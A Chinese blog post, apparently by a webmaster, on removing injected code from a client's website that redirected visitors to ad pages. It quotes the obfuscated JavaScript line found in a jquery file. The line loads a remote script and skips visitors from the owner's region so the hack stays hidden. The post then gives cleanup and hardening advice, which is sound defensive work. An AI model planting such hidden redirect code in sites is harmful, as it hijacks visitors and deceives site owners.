霍者博客

网站被挂马,网站打开一会就自动跳转到其他广告页面怎么解决

最近一个做SEO的客户,网站挂马了,我顺便帮他处理了一下,一般的挂马也就是程序文件被篡改而已,这次在修复好程序文件之后,还会偶尔的出现网站打开一会就自动跳转到其他广告页面的情况。

这我就纳闷了,经过霍者我细心的对挂马网站做排查,终于让我找到了问题所在。

挂马者是通过在js文件里面添加了劫持js代码,通过判断访问者的IP来实现不同跳转的。

具体代码如下:

document.write("<\163"+"cript src='http://\141"+"d.\172"+"om"+"12\63"+".n"+"et/i"+"p.asp?l"+"oc=shandong'><\/s"+"cript>");

因为看着这段代码不像一个好代码,所以分析之后,我得出,后面的“shandong”,这段代码的意思就是IP为山东地区的访问者在访问被挂马页面时不做跳转。其余地区的IP访问者则跳转。

从这段代码我们就可以看出挂马者是多么的用心险恶。

他首先根据你网站所在地进行判断网站管理员经常使用的IP地址所在地,然后有针对性的对网站管理员不做跳转劫持。

所以,这种劫持的情况下,网站管理者非常难以发现到网站被挂马了,还好,客户是山东的,我正好不在山东,所以就被我发现了,否则真的事防不胜防呀。

解决办法也比较简单:

首先校验下原始文件,对比下哪些js文件近期有被改动过,然后针对被改动过的js文件做以上代码段的排除。找到以上代码段后,删除即可。

当然,客户网站是别人做的,我没有原始文件,但是jquery.js这个文件都是通用的,到网上下载一个替换上即可。

最后说一下,各位网站管理者一定要注意保管好网站和服务器的管理密码,尽量设置的复杂一点。同时也要及时检测服务器是否存在漏洞等,及时做针对性处理,以避免类似的事情再发生,能不用虚拟主机就别用虚拟主机,防止旁注风险。


原创文章请注明转载自霍者博客本文地址:http://www.huozheweb.com/post/688.html,标题:网站被挂马,网站打开一会就自动跳转到其他广告页面怎么解决

【我来说两句】
分享到:

相关文章:



评论 0

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。